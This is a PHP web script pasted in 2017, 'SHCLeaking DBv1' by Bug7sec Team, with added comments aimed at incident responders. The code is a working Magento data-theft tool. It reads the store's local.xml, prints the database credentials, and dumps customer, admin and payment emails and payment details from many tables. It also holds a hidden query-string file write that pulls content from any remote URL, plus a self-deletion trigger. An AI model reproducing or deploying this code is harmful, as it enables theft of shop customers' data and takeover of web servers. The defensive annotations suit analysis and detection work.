
Untitled

a guest
Dec 21st, 2017
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>SHCLeaking DBv1 | Bug7sec Team</title>
  5. <style type="text/css">
  6. body{
  7. color: #3EF403;
  8. background-color: black;
  9. }
  10. input {
  11. border: dashed 1px;
  12. border-color: #333;
  13. BACKGROUND-COLOR: Black;
  14. font: 8pt Verdana;
  15. color: #0CFF37;
  16. }
  17.  
  18. select {
  19. border: dashed 1px;
  20. border-color: #333;
  21. BACKGROUND-COLOR: Black;
  22. font: 8pt Verdana;
  23. color: #0CFF37;
  24. }
  25. textarea {
  26. margin: 0;
  27. color: #fff;
  28. background-color: #555;
  29. border: 1px solid #df5;
  30. font: 9pt Monospace,'Courier New'; }
  31. </style>
  32.  
  33. </head>
  34. <body>
  35. <pre style="text-align: center">
  36. -[ SHCLeaking DBv1 | Bug7sec Team ]-
  37. </pre>
  38. <Center>
  39. <form action="" method="post">
  40. <input type="text" value="<?= getcwd();?>/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/">
  41. <select name="cms">
  42. <option>Magento</option>
  43. </select>
  44. <input type="submit" name="submit" value="Scan Now!"/>
  45. </form>
  46. </Center>
  47. <?php
      // error_reporting(0) switches off PHP error reporting for the rest of the
      // request, so warnings raised by the code below are not shown or logged by
      // PHP. On its own this call is a weak hunting signal; pair it with the
      // tool name and author strings in the header comment that follows.
  48. error_reporting(0);
  49. /**
  50. * Name : SHCLeaking DBv1
  51. * Author : Shor7cut
  52. * Team : Bug7sec Team | http://facebook.com/bug7sec
  53. * Spesial : Defacer Tersakiti Team , IndoXploit Team , Tuban Cyber Team , IDBTE4MNET
  54. * Dan Balikita
  55. ------------------------------------------------------
  56. [Spesial Leaking]
  57. - Magento (add 15/04/2016)
  58. ======================================================
  59. - Hanya mengedit Copyright itulah kerjaan lamers , Skill jongkok.
  60. - Tetap bersyukur mas , tanpa mengClaim kodingan orang lain - Shor7cut
  61. */
  62. class shc
  63. {
      // Helper class for the whole script. No method is declared static, yet
      // every call site in this file uses the shc::method() form.

      // drop(): unlinks the file named by basename($_SERVER['PHP_SELF']), a
      // relative name, so it resolves against the current working directory.
      // This is the script deleting itself. Responders should not expect to
      // find the file on disk afterwards; web access logs and file-integrity
      // alerts are the more durable evidence.
  64. public function drop(){
  65. unlink(basename($_SERVER['PHP_SELF']));
  66. }
      // get(): returns file_get_contents($location) with no validation. The
      // only caller in this file passes $_POST['shcpatch'] straight in, so the
      // location read is fully request-controlled.
  67. public function get($location){
  68. $shc = file_get_contents($location);
  69. return $shc;
  70. }
      // dpremove(): returns $data with duplicate values removed (array_unique).
  71. public function dpremove($data){
  72. $shcUniX = array_unique($data);
  73. return $shcUniX;
  74. }
      // count(): returns a banner string containing count($data), CRLF-terminated.
  75. public function count($data){
  76. return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
  77. }
      // dbmagento(): applies four regular expressions to $data, looking for
      // <host>, <username>, <password> and <dbname> elements, and returns the
      // first capture group of each as JSON under the key 'shc_db'.
      // The form's default target is app/etc/local.xml, and shc_dbg() uses
      // these values as database credentials. Keep that file readable by as few
      // accounts as possible, and rotate the credentials it holds after any
      // web-root compromise.
  78. public function dbmagento($data){
  79. $shc_regexhost = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
  80. $shc_regexusername = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
  81. $shc_regexpassword = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
  82. $shc_regexdatabase = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
  83. preg_match($shc_regexhost, $data, $shcleak_1);
  84. preg_match($shc_regexusername, $data, $shcleak_2);
  85. preg_match($shc_regexpassword, $data, $shcleak_3);
  86. preg_match($shc_regexdatabase, $data, $shcleak_4);
  87. $shc_host = $shcleak_1[1];
  88. $shc_user = $shcleak_2[1];
  89. $shc_pass = $shcleak_3[1];
  90. $shc_db = $shcleak_4[1];
  91. $shc_json = array(
  92. 'host' => $shc_host,
  93. 'username' => $shc_user,
  94. 'password' => $shc_pass,
  95. 'database' => $shc_db,
  96. );
  97. return json_encode(array('shc_db' => $shc_json)
  98. );
  99. }
      // shc_dbg(): decodes the JSON produced by dbmagento(), echoes the
      // recovered username and password into the HTTP response without HTML
      // escaping, opens a database connection with them, and returns a
      // de-duplicated list of one column's values from each table listed below.
      // The connection uses the legacy mysql_* API (ext/mysql, removed in
      // PHP 7.0).
  100. public function shc_dbg($data){
  101. $jdata = json_decode(shc::dbmagento($data),true);
  102. if($jdata['shc_db']['host']=="localhost"){
  103. echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
  104. }else{
  105. echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
  106. }
  107. mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
  108. mysql_select_db($jdata['shc_db']['database']);
      // One unfiltered SELECT * per table. The list covers admin, customer,
      // order, payment, quote, newsletter and mail-log tables. For detection:
      // the shop's own database account reading all of these tables in full
      // within a single request is a candidate signal.
      // NOTE(review): confirm against the store's normal query baseline before
      // alerting on it.
  109. $query = array(
  110. 'admin_user' => 'SELECT * FROM admin_user' ,
  111. 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' ,
  112. 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
  113. 'customer_entity' => 'SELECT * FROM customer_entity' ,
  114. 'newsletter_subscriber' => 'SELECT * FROM newsletter_subscriber' ,
  115. 'newsletter_template' => 'SELECT * FROM newsletter_template' ,
  116. 'sales_flat_order_address' => 'SELECT * FROM sales_flat_order_address' ,
  117. 'sales_flat_order_payment' => 'SELECT * FROM sales_flat_order_payment' ,
  118. 'sales_flat_quote' => 'SELECT * FROM sales_flat_quote' ,
  119. 'customer_entity_varchar' => 'SELECT * FROM customer_entity_varchar' ,
  120. 'customer_address_entity_varchar' => 'SELECT * FROM customer_address_entity_varchar' ,
  121. 'product_alert_stock' => 'SELECT * FROM product_alert_stock' ,
  122. 'pws_productqa' => 'SELECT * FROM pws_productqa' ,
  123. 'sales_flat_order' => 'SELECT * FROM sales_flat_order' ,
  124. 'sales_flat_quote_address' => 'SELECT * FROM sales_flat_quote_address' ,
  125. 'smtppro_email_log' => 'SELECT * FROM smtppro_email_log' ,
  126. 'webforms_results_values' => 'SELECT * FROM webforms_results_values' ,
  127. 'sales_recurring_profile' => 'SELECT * FROM sales_recurring_profile'
  128. );
      // Maps each table key above to the single column that is kept from its
      // rows.
  129. $shcolom = array(
  130. 'admin_user' => 'email' ,
  131. 'sales_flat_order_payment' => 'additional_information' ,
  132. 'sales_flat_quote_address' => 'email' ,
  133. 'smtppro_email_log' => 'email_to' ,
  134. 'webforms_results_values' => 'value' ,
  135. 'aw_blog_comment' => 'email' ,
  136. 'customer_entity_varchar' => 'email' ,
  137. 'product_alert_stock' => 'email' ,
  138. 'pws_productqa' => 'email' ,
  139. 'sales_flat_order_address' => 'email' ,
  140. 'customer_entity' => 'email' ,
  141. 'sales_flat_order' => 'customer_email' ,
  142. 'customer_address_entity_varchar' => 'value' ,
  143. 'core_email_queue_recipients' => 'recipient_email' ,
  144. 'newsletter_subscriber' => 'subscriber_email' ,
  145. 'newsletter_template' => 'template_sender_email' ,
  146. 'sales_flat_quote' => 'customer_email' ,
  147. 'sales_recurring_profile' => 'SELECT * FROM admin_user'
  148. );
      // Every row of every listed table is fetched; only the mapped column is
      // appended to $mail.
  149. foreach ($query as $shc_key => $shc_query) {
  150. $hasil = mysql_query($shc_query);
  151. while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
  152. $mail[] = $kolom_db[$shcolom[$shc_key]];
  153. }
  154. }
      // The collected values are returned with duplicates removed.
  155. return shc::dpremove($mail);
  156. }
  157. }
  158. error_reporting(0);
      // The next statement runs on every request, before any form check. Both
      // the destination path ('shcpatch') and the source location ('shcpatchl')
      // come from the query string with no authentication or validation. The
      // HTML form in this file only POSTs 'shcpatch', 'cms' and 'submit', so
      // this GET-driven write path is not visible in the UI.
      // For incident response: treat any host where this file was reachable as
      // having exposed arbitrary file write as the web-server user, and search
      // access logs for requests carrying these parameter names.
  159. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
      // Form handler: reads the location named in the POSTed 'shcpatch' field
      // and passes its contents to shc::shc_dbg(). $data then holds the
      // de-duplicated list that the textarea below prints, one value per line,
      // without HTML escaping.
  160. if($_POST['submit']){
  161. $data = shc::get($_POST['shcpatch']);
  162. $data = shc::shc_dbg($data);
  163. ?>
  164. <center><br><textarea style="margin: 0px; width: 527px; height: 172px;"><?= shc::count($data);?><?php foreach ($data as $value) {echo $value."\r\n";}?></textarea><br>
  165. </center>
  166. <?php
  167. }
      // A request with x=d in the query string calls shc::drop(), which unlinks
      // this script. A missing file on disk therefore does not rule out earlier
      // use; rely on access logs and file-integrity records.
  168. if($_GET['x']=="d"){
  169. shc::drop();
  170. }
  171. ?>
  172.  
  173. </body>
  174. </html>